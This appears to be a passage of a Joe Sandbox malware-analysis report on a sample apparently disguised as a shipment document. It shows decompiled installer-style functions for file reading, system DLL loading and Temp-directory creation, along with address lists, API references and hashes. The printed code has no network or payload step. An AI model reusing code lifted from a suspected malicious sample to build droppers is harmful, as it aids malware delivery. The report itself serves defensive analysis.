						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403499(0x414ec0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce48 = 0x414ec0;
						 *0x40ce4c = _t92;
						while(1) {
							 *0x40ce50 = _t81;
							 *0x40ce54 = _v12; // executed
							_t69 = E00406A4F(0x40ce30); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce50; // 0x418ec0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405569(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce50; // 0x418ec0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E004060A9(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}






















                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dc
                                                0x004032de
                                                0x004032de
                                                0x004032e3
                                                0x004032e8
                                                0x004032f3
                                                0x004032f3
                                                0x00403305
                                                0x00403450
                                                0x00403450
                                                0x00000000
                                                0x0040330b
                                                0x0040330f
                                                0x0040343b
                                                0x00403484
                                                0x00403455
                                                0x0040345b
                                                0x0040345d
                                                0x0040345d
                                                0x0040346e
                                                0x00000000
                                                0x00403470
                                                0x00403475
                                                0x0040347c
                                                0x00403435
                                                0x00403435
                                                0x00403452
                                                0x00403452
                                                0x00000000
                                                0x00403452
                                                0x0040347e
                                                0x00403481
                                                0x00000000
                                                0x00403481
                                                0x0040346e
                                                0x0040348f
                                                0x00000000
                                                0x0040348f
                                                0x00403440
                                                0x00403442
                                                0x00403442
                                                0x0040344e
                                                0x0040348c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040344e
                                                0x00403320
                                                0x00403323
                                                0x00403328
                                                0x00403328
                                                0x00403332
                                                0x00403335
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040333b
                                                0x0040333b
                                                0x0040333b
                                                0x00403343
                                                0x00403345
                                                0x00403345
                                                0x00403356
                                                0x00000000
                                                0x00000000
                                                0x0040335c
                                                0x0040335f
                                                0x00403365
                                                0x0040336b
                                                0x00403373
                                                0x00403379
                                                0x0040337e
                                                0x00403385
                                                0x00403388
                                                0x00000000
                                                0x00000000
                                                0x0040338e
                                                0x00403394
                                                0x00403396
                                                0x004033a3
                                                0x004033a5
                                                0x004033d6
                                                0x004033dc
                                                0x004033e8
                                                0x004033ed
                                                0x004033ed
                                                0x004033f2
                                                0x00403429
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004033f4
                                                0x004033f8
                                                0x0040340d
                                                0x00403410
                                                0x00403413
                                                0x00403419
                                                0x0040341d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403423
                                                0x004033ff
                                                0x00403406
                                                0x00000000
                                                0x00000000
                                                0x00403408
                                                0x00000000
                                                0x00403408
                                                0x004033f2
                                                0x00403431
                                                0x00000000
                                                0x00403431
                                                0x00000000
                                                0x0040333b

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$G8@
                                                • API String ID: 551687249-649311722
                                                • Opcode ID: a26557732bb01f6bddedaf8222426b1e26193f42140191bec4bb00bd26e51081
                                                • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                • Opcode Fuzzy Hash: a26557732bb01f6bddedaf8222426b1e26193f42140191bec4bb00bd26e51081
                                                • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 928 4026ec-402705 call 402d84 931 402c2a-402c2d 928->931 932 40270b-402712 928->932 935 402c33-402c39 931->935 933 402714 932->933 934 402717-40271a 932->934 933->934 936 402720-40272f call 406467 934->936 937 40287e-402886 934->937 936->937 941 402735 936->941 937->931 942 40273b-40273f 941->942 943 4027d4-4027d7 942->943 944 402745-402760 ReadFile 942->944 945 4027d9-4027dc 943->945 946 4027ef-4027ff call 40607a 943->946 944->937 947 402766-40276b 944->947 945->946 948 4027de-4027e9 call 4060d8 945->948 946->937 955 402801 946->955 947->937 950 402771-40277f 947->950 948->937 948->946 951 402785-402797 MultiByteToWideChar 950->951 952 40283a-402846 call 40644e 950->952 951->955 956 402799-40279c 951->956 952->935 961 402804-402807 955->961 959 40279e-4027a9 956->959 959->961 962 4027ab-4027d0 SetFilePointer MultiByteToWideChar 959->962 961->952 963 402809-40280e 961->963 962->959 966 4027d2 962->966 964 402810-402815 963->964 965 40284b-40284f 963->965 964->965 967 402817-40282a 964->967 968 402851-402855 965->968 969 40286c-402878 SetFilePointer 965->969 966->955 967->937 970 40282c-402832 967->970 971 402857-40285b 968->971 972 40285d-40286a 968->972 969->937 970->942 973 402838 970->973 971->969 971->972 972->937 973->937
                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027b6
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                                • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 974 406864-406884 GetSystemDirectoryW 975 406886 974->975 976 406888-40688a 974->976 975->976 977 40689b-40689d 976->977 978 40688c-406895 976->978 979 40689e-4068d1 wsprintfW LoadLibraryExW 977->979 978->977 980 406897-406899 978->980 980->979
                                                C-Code - Quality: 100%
                                                			E00406864(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                0x0040687b
                                                0x00406884
                                                0x00406886
                                                0x00406886
                                                0x0040688a
                                                0x0040689d
                                                0x00406897
                                                0x00406897
                                                0x00406897
                                                0x004068b6
                                                0x004068ca
                                                0x004068d1

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                • wsprintfW.USER32 ref: 004068B6
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 981 405a38-405a83 CreateDirectoryW 982 405a85-405a87 981->982 983 405a89-405a96 GetLastError 981->983 984 405ab0-405ab2 982->984 983->984 985 405a98-405aac SetFileSecurityW 983->985 985->982 986 405aae GetLastError 985->986 986->984
                                                C-Code - Quality: 100%
                                                			E00405A38(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                0x00405a43
                                                0x00405a47
                                                0x00405a4a
                                                0x00405a50
                                                0x00405a54
                                                0x00405a58
                                                0x00405a60
                                                0x00405a67
                                                0x00405a6d
                                                0x00405a74
                                                0x00405a7b
                                                0x00405a83
                                                0x00405a85
                                                0x00000000
                                                0x00405a85
                                                0x00405a8f
                                                0x00405a96
                                                0x00405aac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405aae
                                                0x00405ab2

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                • GetLastError.KERNEL32 ref: 00405A8F
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                • GetLastError.KERNEL32 ref: 00405AAE
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-3916508600
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 987 6eac1817-6eac1856 call 6eac1bff 991 6eac185c-6eac1860 987->991 992 6eac1976-6eac1978 987->992 993 6eac1869-6eac1876 call 6eac2480 991->993 994 6eac1862-6eac1868 call 6eac243e 991->994 999 6eac1878-6eac187d 993->999 1000 6eac18a6-6eac18ad 993->1000 994->993 1001 6eac187f-6eac1880 999->1001 1002 6eac1898-6eac189b 999->1002 1003 6eac18cd-6eac18d1 1000->1003 1004 6eac18af-6eac18cb call 6eac2655 call 6eac1654 call 6eac1312 GlobalFree 1000->1004 1006 6eac1888-6eac1889 call 6eac2b98 1001->1006 1007 6eac1882-6eac1883 1001->1007 1002->1000 1010 6eac189d-6eac189e call 6eac2e23 1002->1010 1008 6eac191e-6eac1924 call 6eac2655 1003->1008 1009 6eac18d3-6eac191c call 6eac1666 call 6eac2655 1003->1009 1028 6eac1925-6eac1929 1004->1028 1019 6eac188e 1006->1019 1012 6eac1885-6eac1886 1007->1012 1013 6eac1890-6eac1896 call 6eac2810 1007->1013 1008->1028 1009->1028 1022 6eac18a3 1010->1022 1012->1000 1012->1006 1027 6eac18a5 1013->1027 1019->1022 1022->1027 1027->1000 1029 6eac192b-6eac1939 call 6eac2618 1028->1029 1030 6eac1966-6eac196d 1028->1030 1037 6eac193b-6eac193e 1029->1037 1038 6eac1951-6eac1958 1029->1038 1030->992 1035 6eac196f-6eac1970 GlobalFree 1030->1035 1035->992 1037->1038 1039 6eac1940-6eac1948 1037->1039 1038->1030 1040 6eac195a-6eac1965 call 6eac15dd 1038->1040 1039->1038 1041 6eac194a-6eac194b FreeLibrary 1039->1041 1040->1030 1041->1038
                                                C-Code - Quality: 88%
                                                			E6EAC1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6eac506c = _a8;
				 *0x6eac5070 = _a16;
				 *0x6eac5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6eac5048, E6EAC1651);
				_push(1); // executed
				_t37 = E6EAC1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6EAC243E(_t54);
					}
					_push(_t54);
					E6EAC2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E6EAC2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6EAC1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E6EAC2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E6EAC2655();
							_t37 = GlobalFree(E6EAC1312(E6EAC1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6EAC2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E6EAC15DD( *0x6eac5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6EAC2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6EAC2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6EAC2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                0x6eac1817
                                                0x6eac1817
                                                0x6eac1817
                                                0x6eac1824
                                                0x6eac182c
                                                0x6eac1839
                                                0x6eac1847
                                                0x6eac184a
                                                0x6eac184c
                                                0x6eac1851
                                                0x6eac1856
                                                0x6eac1978
                                                0x6eac1978
                                                0x6eac185c
                                                0x6eac1860
                                                0x6eac1863
                                                0x6eac1868
                                                0x6eac1869
                                                0x6eac186a
                                                0x6eac1870
                                                0x6eac1876
                                                0x6eac18a6
                                                0x6eac18ad
                                                0x6eac18d1
                                                0x6eac191e
                                                0x6eac191f
                                                0x6eac18d3
                                                0x6eac18d3
                                                0x6eac18d4
                                                0x6eac18dd
                                                0x6eac18de
                                                0x6eac18e8
